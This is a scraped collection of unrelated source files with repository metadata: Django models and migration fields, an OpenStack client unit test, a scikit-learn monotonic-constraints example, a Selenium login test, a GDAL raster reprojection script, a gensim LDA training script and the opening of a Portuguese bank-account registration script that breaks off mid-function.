u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'subtitle': ('django.db.models.fields.CharField', [], {'max_length': '384', 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '384'}),
'year': ('django.db.models.fields.CharField', [], {'max_length': '12', 'null': 'True', 'blank': 'True'})
}
}
complete_apps = ['archives']
| [
"[email protected]"
] | |
45b1e2030a82a579787b6264898649012691ae6a | e17eeedcd07cfbfe8879ba27654dc399964da466 | /openstackclient/tests/unit/network/test_utils.py | 6252d7f76644760b40d5c7515fda4ce8ec159195 | [
"Apache-2.0"
] | permissive | sapcc/python-openstackclient | 2ec0a0af8c7010fd12a8c92c3df1e70bb9e2c52d | 8aafc9e687b0dcf15709d4029b55b0271160f1ce | refs/heads/master | 2023-04-16T03:09:21.987741 | 2021-08-01T20:57:20 | 2022-04-05T17:16:52 | 96,403,544 | 0 | 0 | Apache-2.0 | 2023-04-04T01:36:45 | 2017-07-06T07:50:31 | Python | UTF-8 | Python | false | false | 2,051 | py | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
from osc_lib import exceptions
from openstackclient.network import utils
from openstackclient.tests.unit import utils as tests_utils
class TestUtils(tests_utils.TestCase):
def test_str2bool(self):
self.assertTrue(utils.str2bool("true"))
self.assertTrue(utils.str2bool("True"))
self.assertTrue(utils.str2bool("TRUE"))
self.assertTrue(utils.str2bool("TrUe"))
self.assertFalse(utils.str2bool("false"))
self.assertFalse(utils.str2bool("False"))
self.assertFalse(utils.str2bool("FALSE"))
self.assertFalse(utils.str2bool("FaLsE"))
self.assertFalse(utils.str2bool("Something else"))
self.assertFalse(utils.str2bool(""))
self.assertIsNone(utils.str2bool(None))
def test_str2list(self):
self.assertEqual(
['a', 'b', 'c'], utils.str2list("a;b;c"))
self.assertEqual(
['abc'], utils.str2list("abc"))
self.assertEqual([], utils.str2list(""))
self.assertEqual([], utils.str2list(None))
def test_str2dict(self):
self.assertEqual(
{'a': 'aaa', 'b': '2'},
utils.str2dict('a:aaa;b:2'))
self.assertEqual(
{'a': 'aaa;b;c', 'd': 'ddd'},
utils.str2dict('a:aaa;b;c;d:ddd'))
self.assertEqual({}, utils.str2dict(""))
self.assertEqual({}, utils.str2dict(None))
self.assertRaises(
exceptions.CommandError,
utils.str2dict, "aaa;b:2")
| [
"[email protected]"
] | |
5e521d0a7227ad3e4be3e4a0d4b7c4ea655d494e | 62491ec663dd603c8e72efca44b58ec31afdff39 | /up/apps/messaging/models.py | 427bf4dc50aadaa24e942f722bda5611e1813a76 | [] | no_license | chuck-swirve/up | 63a2d617cdbefaa1ac91cfbe09b28045344a5ed7 | a18f6118853df80694a33b81b710fca094f736db | refs/heads/master | 2021-01-18T22:12:53.238169 | 2016-08-22T02:27:29 | 2016-08-22T02:27:29 | 72,303,329 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,008 | py | from __future__ import (absolute_import, division, print_function,
unicode_literals)
from django.conf import settings
from django.db import models
from django.db import transaction
from common import models as common_models
class Inbox(common_models.BaseModel):
owner = models.OneToOneField(settings.AUTH_USER_MODEL,
related_name='inbox')
def has_unread_messages(self):
return self.get_unread_messages().count() > 0
def get_incoming_messages(self):
return self.received_messages.filter(
is_deleted=False
)
def get_outgoing_messages(self):
return self.sent_messages.all()
def get_unread_messages(self):
return self.get_incoming_messages().filter(
is_read=False
)
def get_conversations(self):
messages = self.get_incoming_messages() | self.get_outgoing_messages()
unread_convo_ids = self.get_unread_messages().values_list(
'conversation_id', flat=True)
convos = self.in_conversations.all().annotate(
has_unread=models.Case(
models.When(id__in=unread_convo_ids, then=True),
default=False,
output_field=models.BooleanField()
)
)
return convos
class Conversation(common_models.BaseModel):
subject = models.CharField(max_length=150)
participants = models.ManyToManyField(
Inbox, related_name='in_conversations')
def reply(self, from_inbox, content):
with transaction.atomic():
to_inbox = self.participants.exclude(id=from_inbox.id).first()
if to_inbox is None: # convo with self...
to_inbox = from_inbox
new_message = Message()
new_message.sender = from_inbox
new_message.recipient = to_inbox
new_message.content = content
new_message.conversation = self
new_message.save()
self.save()
class Message(common_models.BaseModel):
sender = models.ForeignKey(Inbox,
related_name='sent_messages')
recipient = models.ForeignKey(Inbox,
related_name='received_messages')
conversation = models.ForeignKey(Conversation,
related_name='messages')
content = models.TextField()
is_read = models.BooleanField(default=False)
@classmethod
def compose_new(cls, from_inbox, to_inbox, subject, content):
with transaction.atomic():
new_convo = Conversation(subject=subject)
new_convo.save()
new_convo.participants.add(from_inbox, to_inbox)
new_message = Message()
new_message.sender = from_inbox
new_message.recipient = to_inbox
new_message.content = content
new_message.conversation = new_convo
new_message.save()
return new_message
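# --- Usage sketch (added for illustration; not part of the original app). ---
# `alice` and `bob` are hypothetical auth.User instances whose related Inbox
# rows already exist; the helper is only defined, never called, so importing
# this module stays side-effect free.
def _example_message_flow(alice, bob):
    """Sketch of the intended call sequence for the models above."""
    # compose_new() opens a Conversation and its first Message atomically.
    first = Message.compose_new(alice.inbox, bob.inbox,
                                subject="Hello", content="Hi Bob!")
    # reply() reuses the other participant of the same Conversation.
    first.conversation.reply(bob.inbox, "Hi Alice!")
    # get_conversations() annotates each Conversation with `has_unread`.
    return alice.inbox.get_conversations(), bob.inbox.get_unread_messages()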
| [
"[email protected]"
] | |
c11e9e17d2a71e4dc915d7c7f64e14d6bf9b9f5b | 27dc0d3f94b947120657098db4139e0341b593ba | /examples/ensemble/plot_monotonic_constraints.py | 6146a3bb72db1065dd5cb68126e785a2a3bd57c8 | [
"BSD-3-Clause"
] | permissive | ABHIGPT401/scikit-learn | 06283a56290903d4831591cb2218798f0302df65 | 4448dd47162a04164d9edd771d1f5d73bcf9c4fe | refs/heads/main | 2023-09-01T09:55:03.066820 | 2021-10-07T04:58:50 | 2021-10-07T04:58:50 | 411,531,901 | 1 | 0 | BSD-3-Clause | 2021-09-29T04:39:58 | 2021-09-29T04:39:57 | null | UTF-8 | Python | false | false | 2,203 | py | """
=====================
Monotonic Constraints
=====================
This example illustrates the effect of monotonic constraints on a gradient
boosting estimator.
We build an artificial dataset where the target value is in general
positively correlated with the first feature (with some random and
non-random variations), and in general negatively correlated with the second
feature.
By imposing a positive (increasing) or negative (decreasing) constraint on
the features during the learning process, the estimator is able to properly
follow the general trend instead of being subject to the variations.
This example was inspired by the `XGBoost documentation
<https://xgboost.readthedocs.io/en/latest/tutorials/monotonic.html>`_.
"""
from sklearn.ensemble import HistGradientBoostingRegressor
from sklearn.inspection import PartialDependenceDisplay
import numpy as np
import matplotlib.pyplot as plt
print(__doc__)
rng = np.random.RandomState(0)
n_samples = 5000
f_0 = rng.rand(n_samples) # positive correlation with y
f_1 = rng.rand(n_samples) # negative correlation with y
X = np.c_[f_0, f_1]
noise = rng.normal(loc=0.0, scale=0.01, size=n_samples)
y = (5 * f_0 + np.sin(10 * np.pi * f_0) -
5 * f_1 - np.cos(10 * np.pi * f_1) +
noise)
fig, ax = plt.subplots()
# Without any constraint
gbdt = HistGradientBoostingRegressor()
gbdt.fit(X, y)
disp = PartialDependenceDisplay.from_estimator(
gbdt,
X,
features=[0, 1],
line_kw={"linewidth": 4, "label": "unconstrained", "color": "tab:blue"},
ax=ax,
)
# With positive and negative constraints
gbdt = HistGradientBoostingRegressor(monotonic_cst=[1, -1])
gbdt.fit(X, y)
PartialDependenceDisplay.from_estimator(
gbdt,
X,
features=[0, 1],
feature_names=(
"First feature\nPositive constraint",
"Second feature\nNegtive constraint",
),
line_kw={"linewidth": 4, "label": "constrained", "color": "tab:orange"},
ax=disp.axes_,
)
for f_idx in (0, 1):
disp.axes_[0, f_idx].plot(
X[:, f_idx], y, "o", alpha=0.3, zorder=-1, color="tab:green"
)
disp.axes_[0, f_idx].set_ylim(-6, 6)
plt.legend()
fig.suptitle("Monotonic constraints illustration")
plt.show()
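# Added sketch (not part of the upstream example): numerically spot-check the
# fitted constraints by sweeping one feature while holding the other fixed.
grid = np.linspace(0, 1, 100)
pred_f0 = gbdt.predict(np.c_[grid, np.full_like(grid, 0.5)])
pred_f1 = gbdt.predict(np.c_[np.full_like(grid, 0.5), grid])
assert np.all(np.diff(pred_f0) >= 0)  # non-decreasing in the first feature
assert np.all(np.diff(pred_f1) <= 0)  # non-increasing in the second feature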
| [
"[email protected]"
] | |
fceff945861b4786665c029e26c74008e81d768d | 357a19924fb68d8c32bf77fbc201f61cedac6937 | /POM_UnitTest_HTMLReports_Framework_SDET/TestCase_Orange_hrm_login.py | 8425c7594f0988dcbd840e58386c3b03d7f096e2 | [] | no_license | Chi10ya/Selenium-with-Python | e2ecb0d3454f8e82bca0e89a38ddb5d6b3627533 | df0169cc75212157fc1314461d2d8c8dff36c500 | refs/heads/master | 2022-10-23T22:48:12.956801 | 2020-06-10T07:45:09 | 2020-06-10T07:45:09 | 256,746,070 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,414 | py | from selenium import webdriver
import unittest
from selenium.webdriver.common.by import By
import HtmlTestRunner
class OrangeHRMTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
chromeDriverPath = "C:\\Users\\chaitanya.mohammad\\PycharmProjects\\Python_Selenium_BrowserDrivers\\chromedriver.exe"
cls.driver=webdriver.Chrome(executable_path=chromeDriverPath)
cls.driver.maximize_window()
def test_homePageTitle(self):
demoAppURL = "https://opensource-demo.orangehrmlive.com"
self.driver.get(demoAppURL)
self.assertEqual("OrangeHRM", self.driver.title, "webpage title is not matching")
def test_login(self):
demoAppURL = "https://opensource-demo.orangehrmlive.com"
self.driver.get(demoAppURL)
self.driver.find_element(By.NAME, "txtUsername").send_keys("Admin")
self.driver.find_element(By.NAME, "txtPassword").send_keys("admin123")
self.driver.find_element(By.NAME, "Submit").click()
self.assertEqual("OrangeHRM", self.driver.title, "webpage title is not matching")
@classmethod
def tearDownClass(cls):
cls.driver.quit()
print("Test Completed")
if __name__ == '__main__':
unittest.main(testRunner=HtmlTestRunner.HTMLTestRunner(output='C:\\Users\\chaitanya.mohammad\\PycharmProjects\\SDET_SeleniumWithPython\\POM_UntiTest_HTMLReports_Framework-SDET\\Reports')) | [
"[email protected]"
] | |
f357352e2b4139eaa7e6bef581fb10ea734d9cf2 | fa07722e4f803c42ee57a7a7fd511d95bad079e4 | /r_rprj_mt.py | 003d4a629edbb8fe793b0370f8000e6157f3ca9f | [
"MIT"
] | permissive | Ivanych999/gispython | 48207c50c3101383dec41a4ae2a90805ec51a7f3 | f15842ea502f235afbda638ce2769a0057c97eea | refs/heads/master | 2021-01-18T07:21:40.112534 | 2015-10-29T14:38:37 | 2015-10-29T14:38:37 | 44,006,578 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,155 | py | # -*- coding: utf-8 -*-
__author__ = '[email protected]'
import os,sys,datetime,argparse,threading,time,shutil
from osgeo import gdal
from gdalconst import *
from Queue import Queue
queue = Queue()
LOCK = threading.RLock()
# CONSTs
folders = {
0.5: '0_5', # subfolder for raster with 0.5 pixel size
1.0: '1_0', # subfolder for raster with 1.0 pixel size
1.5: '1_5', # subfolder for raster with 1.5 pixel size
2.0: '2_0', # subfolder for raster with 2.0 pixel size
2.5: '2_5' # subfolder for raster with 2.5 pixel size
}
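# Added note: the dict key is the raster pixel size read from GetGeoTransform()[1]
# in main(), so e.g. a GeoTIFF whose pixel size is 0.5 is routed to the '0_5'
# subfolder of the output directory.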
# severity: 0 - Info, 1 - Warning, 2 - Error
def AddMessage(severity,message):
sd = {0: 'Info', 1: 'Warning', 2: 'Error'}
print "{0} at {1}: {2}".format(sd[severity],datetime.datetime.now().strftime('%d.%m.%Y %H:%M:%S'),message)
def ParseArgs():
ap = argparse.ArgumentParser(description='Reproject rasters and build pyramids')
    ap.add_argument('--in-folder', '-i', type=str, action='store', required=True, help='Root folder for scanning GeoTIFF files')
    ap.add_argument('--tmp-folder', '-t', type=str, action='store', required=False, help='Temp folder')
    ap.add_argument('--out-folder', '-o', type=str, action='store', required=True, help='Output folder')
ap.add_argument('--epsg', '-e', type=int, action='store', default=3857, required=True, help='Target EPSG')
    ap.add_argument('--threading-count', '-c', type=int, action='store', default=24, required=True, help='Threading count')
ap.add_argument('--replace', '-r', action='store_true', default=False, help='Replace output')
ap.add_argument('--build', '-b', action='store_true', default=False, help='Build pyramids')
args = ap.parse_args()
args_dict = vars(args)
return vars(args)
def BuildPyramids(rst):
try:
if os.path.exists(rst):
if os.path.exists(rst+'.ovr'):
os.remove(rst+'.ovr')
return os.system('gdaladdo -ro "%s" 2 4 8 16 32' % rst)
except Exception,err:
return u'Error: %s' % unicode(err)
def Reproject(i_rst, o_rst, t_epsg):
try:
if os.path.exists(i_rst):
if os.path.exists(o_rst):
os.remove(o_rst)
return os.system('gdalwarp -t_srs EPSG:%s "%s" "%s"' % (t_epsg,i_rst,o_rst))
except Exception,err:
return u'Error: %s' % unicode(err)
def SaveStatFirstLine(csv, use_temp = True):
csvf = open(csv,'w')
if use_temp:
csvf.write('"src_file";"result";"dst_folder";"dst_file";"dst_file_size";"reproject_time";"pyramids_time";"pyramids_size";"moving_time"\n')
else:
csvf.write('"src_file";"result";"dst_folder";"dst_file";"dst_file_size";"reproject_time";"pyramids_time";"pyramids_size"\n')
csvf.close()
def SaveStatLine(csv, line, use_temp = True):
global LOCK
LOCK.acquire()
csvf = open(csv,'a')
if use_temp:
csvf.write('"{0}";"{1}";"{2}";"{3}";{4};"{5}";"{6}";{7};"{8}"\n'.format(line.get('src_file',''),line.get('result',''),line.get('dst_folder',''),line.get('dst_file',''),line.get('dst_file_size',0),line.get('reproject_time',''),line.get('pyramids_time',''),line.get('pyramids_size',0),line.get('moving_time','')))
else:
csvf.write('"{0}";"{1}";"{2}";"{3}";{4};"{5}";"{6}";{7}\n'.format(line.get('src_file',''),line.get('result',''),line.get('dst_folder',''),line.get('dst_file',''),line.get('dst_file_size',0),line.get('reproject_time',''),line.get('pyramids_time',''),line.get('pyramids_size',0)))
csvf.close()
LOCK.release()
def doWork():
global queue
global use_temp
while True:
# Try get task from queue
try:
c_task = queue.get_nowait()
except:
return
# Initialize stat dict
stat_line = {}
# Set start stat parameters
stat_line['src_file'] = c_task['in_file']
stat_line['result'] = 'success'
stat_line['dst_folder'] = c_task['out_folder']
stat_line['dst_file'] = os.path.basename(c_task['in_file'])
AddMessage(0,'Processes with %s' % c_task['in_file'])
try:
tmp_name = os.path.join(c_task['out_folder'],stat_line['dst_file'])
if use_temp:
tmp_name = os.path.join(c_task['tmp_folder'],stat_line['dst_file'])
# Start reproject
p_start_time = datetime.datetime.now()
Reproject(c_task['in_file'],tmp_name,c_task['epsg'])
stat_line['dst_file_size'] = os.path.getsize(tmp_name)
stat_line['reproject_time'] = '%s' % (datetime.datetime.now()-p_start_time)
if c_task['build']:
# Start build pyramids
pm_start_time = datetime.datetime.now()
BuildPyramids(tmp_name)
stat_line['pyramids_size'] = os.path.getsize(tmp_name+'.ovr')
stat_line['pyramids_time'] = '%s' % (datetime.datetime.now()-pm_start_time)
if use_temp:
# Start moving results
mv_start_time = datetime.datetime.now()
out_name = os.path.join(c_task['out_folder'],stat_line['dst_file'])
shutil.move(tmp_name,out_name)
if c_task['build']:
shutil.move(tmp_name+'.ovr',out_name+'.ovr')
stat_line['moving_time'] = '%s' % (datetime.datetime.now()-mv_start_time)
except Exception,err:
AddMessage(2,'Cannot process file %s' % c_task['in_file'])
stat_line['result'] = 'error'
stat_line['dst_folder'] = err
SaveStatLine(c_task['stat_file'],stat_line,use_temp)
def main():
global queue
global use_temp
# Parsing input args
args = ParseArgs()
# Check input folder
if os.path.exists(args['in_folder']):
# Check output folder
if not os.path.exists(args['out_folder']):
try:
os.mkdir(args['out_folder'])
AddMessage(0,'Folder %s created' % args['out_folder'])
except Exception,err:
AddMessage(2,'Cannot create output folder %s: %s' % (args['out_folder'],err))
return
# Set use temp
use_temp = False
if args.get('tmp_folder',None):
use_temp = True
# Check temp folder
if use_temp:
if not os.path.exists(args['tmp_folder']):
try:
os.mkdir(args['tmp_folder'])
AddMessage(0,'Folder %s created' % args['tmp_folder'])
except Exception,err:
AddMessage(2,'Cannot create temp folder %s: %s' % (args['tmp_folder'],err))
return
AddMessage(0,'Start scan %s' % args['in_folder'])
# Create statistic file
csv = os.path.join(args['out_folder'],'statistic.csv')
if use_temp:
csv = os.path.join(args['tmp_folder'],'statistic.csv')
SaveStatFirstLine(csv,use_temp)
# Start scan folders tree and making queue
for root,dir,files in os.walk(args['in_folder']):
AddMessage(0,'Current dir is %s' % root)
for f in files:
if f.rpartition('.')[2].lower() == 'tif':
f_task = {}
f_task['in_file'] = os.path.join(root,f)
f_task['tmp_folder'] = args.get('tmp_folder',None)
f_task['build'] = args['build']
f_task['stat_file'] = csv
f_task['epsg'] = args['epsg']
f_task['replace'] = args['replace']
AddMessage(0,'Processes with %s ' % f)
try:
ro = gdal.Open(f_task['in_file'], GA_ReadOnly)
if ro:
f_task['out_folder'] = os.path.join(args['out_folder'],folders[ro.GetGeoTransform()[1]])
ro = None
# Check output folder
if not os.path.exists(f_task['out_folder']):
try:
os.mkdir(f_task['out_folder'])
AddMessage(0,'Folder %s created' % f_task['out_folder'])
except Exception,err:
AddMessage(2,'Cannot create output folder %s: %s' % (args['out_folder'],err))
continue
if os.path.exists(os.path.join(f_task['out_folder'],f)):
if args['replace']:
AddMessage(1,'Start removing output file %s' % f)
os.remove(os.path.join(f_task['out_folder'],f))
if os.path.exists(os.path.join(f_task['out_folder'],f)+'.ovr'):
os.remove(os.path.join(f_task['out_folder'],f)+'.ovr')
AddMessage(0,'Output file %s removed' % f)
queue.put(f_task)
AddMessage(0,'File %s put into queue' % f)
else:
queue.put(f_task)
AddMessage(0,'File %s put into queue' % f)
else:
AddMessage(1,'Error while opening file %s' % f)
except:
AddMessage(1,'Error while opening file %s' % f)
        AddMessage(0,'Scanning completed')
AddMessage(0,'Start work with tasks')
        for _ in xrange(args['threading_count']):
thread_ = threading.Thread(target=doWork)
thread_.start()
while threading.active_count() > 1:
time.sleep(1)
AddMessage(0,'All tasks completed')
if __name__ == '__main__':
main()
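# Example invocation (added sketch; the paths and worker count are hypothetical):
#   python r_rprj_mt.py -i /data/tiff_in -t /data/tmp -o /data/tiff_3857 -e 3857 -c 8 -r -b
# Besides the Python GDAL bindings, the gdalwarp and gdaladdo command line tools
# must be on PATH, because Reproject() and BuildPyramids() shell out via os.system.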
| [
"[email protected]"
] | |
0192dd21e181ec805541dd1f7348647918833069 | 61f8caa755c5f77984f0513ca60392a889154495 | /src/Tfit_param_histograms.py | bb43bae7ce465d1f4af41cd0c6d9ca2a89f3c7f2 | [] | no_license | jdrubin91/GROAnalysis | 1f45aaf9185fd574b64c56f855dfaa7202625157 | fb692c3d9975f003d51929f4a07f466f43b7feaf | refs/heads/master | 2021-01-10T08:59:05.207471 | 2017-12-12T17:54:13 | 2017-12-12T17:54:13 | 49,988,869 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,262 | py | __author__ = 'Jonathan Rubin'
import os
import sys
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
from matplotlib import rcParams
rcParams.update({'figure.autolayout': True})
from scipy.stats import gaussian_kde
from scipy.stats import norm
import numpy as np
import math
#Return parent directory
def parent_dir(directory):
pathlist = directory.split('/')
newdir = '/'.join(pathlist[0:len(pathlist)-1])
return newdir
#Home directory
homedir = os.path.dirname(os.path.realpath(__file__))
#File directory
filedir = parent_dir(homedir) + '/files'
#Figure directory
figuredir = parent_dir(homedir) + '/figures/'
def run(folder):
names = ['mu_k', 'sigma_k', 'lambda_k', 'pi_k', 'fp_k', 'w_[p,k]', 'w_[f,k]', 'w_[r,k]', 'b_[f,k]', 'a_[r,k]']
values = [[] for i in range(len(names))]
for file1 in os.listdir(folder):
if 'K_models_MLE.tsv' in file1:
print file1
with open(folder + file1) as F:
for line in F:
if '#' not in line[0]:
if '>' in line[0]:
i = 0
if i == 2:
line = line.strip().split()[1:]
w = line[5].split(',')
for k in range(len(line)):
if k == 5:
for l in range(len(w)):
values[k+l].append(float(w[l]))
elif k > 5:
values[k+2].append(float(line[k]))
else:
values[k].append(float(line[k]))
i+=1
length = len(names)
F = plt.figure()
F.suptitle(file1, fontsize=14)
for i in range(length):
        ax = F.add_subplot(2,5,i+1)  # matplotlib subplot indices start at 1
plt.hist(values[i],bins=100)
ax.set_title(names[i])
plt.savefig(figuredir + file1 + '.png')
if __name__ == "__main__":
folder = '/projects/dowellLab/Taatjes/170207_K00262_0069_AHHMHVBBXX/cat/trimmed/flipped/bowtie2/sortedbam/genomecoveragebed/fortdf/'
run(folder) | [
"[email protected]"
] | |
81918093546a7302b6a193c07d3dbc4b5974fd75 | 61487f888f6d4383a2f357c53aabf298df0d9343 | /golImage.py | 1d80f69a4c7767e882db4e602f27d0fb35606e6b | [
"MIT"
] | permissive | dwoiwode/Game-Of-Life-Media-Renderer | b44475b4cf417aba648a457929db7fa04dbf8d3b | 05ad2eb52a4c5cc4f7e2e92adc0820c1b616beba | refs/heads/master | 2021-06-24T19:02:19.155725 | 2020-12-28T22:14:00 | 2020-12-28T22:14:00 | 195,087,864 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,520 | py | import os
import random
from pathlib import Path
import cv2
from tqdm import tqdm
import utils.colormaps as cm
from gol import GoL
from imageRenderer import RenderSettings, renderImage
class GoLImageRenderer:
def __init__(self, folder, width, height, fpg=1, showNeighbourCount=False, showGridlines=False,
colormap=None, renderer=None):
self.folder = folder
# Rendersettings
self.renderer = renderer if renderer is not None else renderImage
self.renderSettings = RenderSettings(width, height)
self.renderSettings.colormap = colormap
self.renderSettings.showNeighbours = showNeighbourCount
self.renderSettings.showGridlines = showGridlines
self.renderSettings.onColorIndex = 255
self.renderSettings.offColorIndex = 0
# Videosettings
self.fpg = fpg
os.makedirs(Path(folder), exist_ok=True)
self.oldImage = None
def appendGoL(self, gol: GoL, maxGenerations=100,
tl=(0, 0), br=(-1, -1), preview=False, abortCondition=None, onColorChange=0, offColorChange=0,
**kwargs):
minTL, maxTL = tl
minBR, maxBR = br
try:
_, _ = minTL
except TypeError:
minTL = maxTL = tl
try:
_, _ = minBR
except TypeError:
minBR = maxBR = br
maxGenerations += 1
progressRange = tqdm(range(maxGenerations))
for i in progressRange:
for frameNo in range(self.fpg):
curTL = [min_tl + (max_tl - min_tl) / (maxGenerations * self.fpg) * ((i - 1) * self.fpg + frameNo) for
min_tl, max_tl in zip(minTL, maxTL)]
curBR = [min_br + (max_br - min_br) / (maxGenerations * self.fpg) * ((i - 1) * self.fpg + frameNo) for
min_br, max_br in zip(minBR, maxBR)]
self.renderSettings.topLeft = curTL
self.renderSettings.bottomRight = curBR
img = self.renderer(gol, self.renderSettings)
if preview:
cv2.imshow(self.folder, img)
cv2.setWindowTitle(self.folder, f"{self.folder} - {i} ({frameNo}/{self.fpg})")
if cv2.waitKey(1) & 0xFF == ord('q'):
break
cv2.imwrite(str(Path(self.folder)) + f"/{gol.name}_{gol.generation}_{frameNo:02d}.jpg", img)
gol.step()
if abortCondition is not None and abortCondition(gol):
progressRange.close()
return
changeOnColor = (0.5 - random.random()) * 2 * onColorChange
changeOffColor = (0.5 - random.random()) * 2 * offColorChange
self.renderSettings.onColorIndex = min(max(self.renderSettings.onColorIndex + changeOnColor, 128), 255)
self.renderSettings.offColorIndex = min(max(self.renderSettings.offColorIndex + changeOffColor, 0), 128)
def addHighlight(self, position, color, size):
if isinstance(color, str):
color = cm._htmlColor(color)
self.renderSettings.highlights.append((position, color, size))
def addText(self, position, text, color):
if isinstance(color, str):
color = cm._htmlColor(color)
self.renderSettings.texts.append((position, text, color))
def renderImage(self, gol: GoL):
if not isinstance(gol, GoL):
gol = GoL(gol)
return self.renderer(gol, self.renderSettings)
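# --- Usage sketch (added; how a GoL instance is constructed is an assumption,
# since only gol.name, gol.generation and gol.step() are used above). ---
# renderer = GoLImageRenderer("out/run1", 1920, 1080, fpg=4, showGridlines=True)
# renderer.addText((10, 10), "demo run", "#ffffff")
# renderer.appendGoL(some_gol, maxGenerations=200, tl=(0, 0), br=(-1, -1),
#                    preview=False)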
| [
"[email protected]"
] | |
f387437c4d43d4be308abb9110efec9f3d4d303c | a550d4097c993601d4159f03bc148f19b721c530 | /train_lda.py | ba20227a90a90b297c2ba6a490112f99796fa780 | [] | no_license | nitinhardeniya/hackpredict | 35ccea4934c010c28aed0cbf488c212c66895096 | a4f2c20cee811aedc90e476580a77c51c6e02979 | refs/heads/master | 2020-05-30T03:11:37.150740 | 2015-04-11T13:35:54 | 2015-04-11T13:35:54 | 33,776,767 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,297 | py |
#########################################################################################
#: The main utility to train the LDA using gensim
# more info http://radimrehurek.com/gensim/
#: Author :Nitin Hardeniya
#########################################################################################
import sys
import logging
import os
import numpy
from gensim import corpora, models, similarities
from threading import Thread
from readutils import readreviews
logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', filename="logs_training.txt", level=logging.INFO)
# define a Handler which writes INFO messages or higher to the sys.stderr
console = logging.StreamHandler()
console.setLevel(logging.INFO)
# set a format which is simpler for console use
formatter = logging.Formatter('%(name)-12s: %(levelname)-8s %(message)s')
# tell the handler to use this format
console.setFormatter(formatter)
# add the handler to the root logger
logging.getLogger('').addHandler(console)
def trainLda(docs,numTopics,reports_dir, dictoutfile="dictionary.txt", modeloutfile="model.txt"):
'''
Trains an lda on the list of documents.
docs: a list of document words {list of list of words}
numTopics: number of topics of the lda to be trained
dictoutfile: output file where dictionary is saved
modeloutfile: output file where trained model is saved
perplexity.txt : To evaluate the topics model for different no of topics
'''
print docs
#print len(docs)
perplexity=open(os.path.join(reports_dir,'_perplexity.txt'),'a')
topicsTopwordsfile=open(os.path.join(reports_dir,'_'+str(numTopics)+'.txt'),'w')
topicswordsfile=open(os.path.join(reports_dir,'_'+str(numTopics)+'allwords.txt'),'w')
dictionary = corpora.Dictionary(docs)
corpus = [dictionary.doc2bow(doc) for doc in docs]
tfidf =models.TfidfModel(corpus)
# tfidf convert
corpus_tfidf = tfidf[corpus]
#print corpus
#passes=50
logging.info("Starting model training")
model = models.ldamodel.LdaModel(corpus_tfidf, id2word=dictionary, num_topics=numTopics)
model.print_topics(50)
for i in range(0, model.num_topics):
word=model.print_topic(i)
topicsTopwordsfile.write("topic"+str(i)+'-'*100+'\n')
topicsTopwordsfile.write(word+'\n')
# saving perplexity and other for the model selection
perplex = model.bound(corpus)
#@to-do
#Per_word_Perplexity=numpy.exp2(-perplex / sum(cnt for document in corpus for cnt in document))
perplexity.write("Topics :"+str(numTopics)+'\t'+str(perplex)+'\n')
#perplexity.write("Per-word Perplexity :"+str(numTopics)+'\t'+str(Per_word_Perplexity)+'\n')
logging.info("Done model training")
# Save the model
dictionary.save(dictoutfile)
model.save(modeloutfile)
def training(start, end, step, outdir, dealfile, pds=''):
    ''' Batch function that calls trainLda for a range of topic counts.
    start=(int) :start in the range of topics we want to try
    end=(int) : end in the range of topics we want to try
    step =(int) :stepsize in the range of topics we want to try
    outdir, dealfile and pds were undefined globals in the original sketch and
    are taken as explicit arguments here (assumption).
    '''
    if(not os.path.exists(outdir)): os.mkdir(outdir)
    reports_dir=os.path.join(outdir, 'reports'+pds)
    if(not os.path.exists(reports_dir)):os.mkdir(reports_dir)
    docs = readreviews(dealfile)
    for numTopics in range(start, end, step):
        trainLda(docs, numTopics, reports_dir,
                 dictoutfile=os.path.join(reports_dir, 'dictionary_%d.txt' % numTopics),
                 modeloutfile=os.path.join(reports_dir, 'model_%d.txt' % numTopics))
def main():
#training()
#parsereviews(sys.argv[1],sys.argv[2])
return
if(__name__ == "__main__"):
main()
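# Example (added sketch; the folder and file names are hypothetical):
#   training(start=5, end=50, step=5, outdir='lda_runs', dealfile='reviews.tsv')
# fits LDA models with 5, 10, ..., 45 topics and writes the per-topic reports,
# dictionaries and models under lda_runs/reports.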
| [
"[email protected]"
] | |
f3cf5e33ee6238e6931cf49d8df1824ab21d1b81 | 8dc1f6120dbc06fc4ceddba50c63bc8fc0057366 | /TrabalhoFinal.py | 256b5dc0f8fcbf50cc6d18b53e5855aed430ee69 | [] | no_license | tedescovinicius/Trabalho-final-Disciplina-de-Algoritmos | d314e31e96eb2511afe84cd737e7e29982340f18 | 654d87d5105a6f0c7f1b285d3966fe3f9b2a622f | refs/heads/master | 2022-09-11T15:57:17.569437 | 2019-12-16T15:16:23 | 2019-12-16T15:16:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,540 | py | import os
def clear(): # Clears the terminal screen (Windows or Unix)
    os.system('cls' if os.name == 'nt' else 'echo -e \\\\033c')
class cadastro: # Record class holding the customer data fields
nome=''
sobrenome=''
cpf=''
email=''
endereco=''
telefone=0
nconta=0
lcredito= 1000
saldo= 0.0
def dados (l): # Registers a new customer in the list l
p1=cadastro()
p1.nome=input('Nome:')
p1.sobrenome=input('Sobrenome:')
p1.cpf=int(input('CPF:'))
p1.email=input('Email:')
p1.endereco=input('Endereço:')
p1.telefone=input('Telefone:')
p1.nconta=input('Numero da conta:')
p1.lcredito= 1000.00
p1.saldo=float(input('Saldo da conta:'))
    if (len(l) !=0): # if the list l is not empty
        for i in range (len(l)): # iterate over the list l
            if (l[i].cpf == p1.cpf): # the typed CPF is already registered
                clear() # clear the screen
                print (' Cpf já cadastrado')
                return
            if (l[i].nconta == p1.nconta): # the typed account number already exists
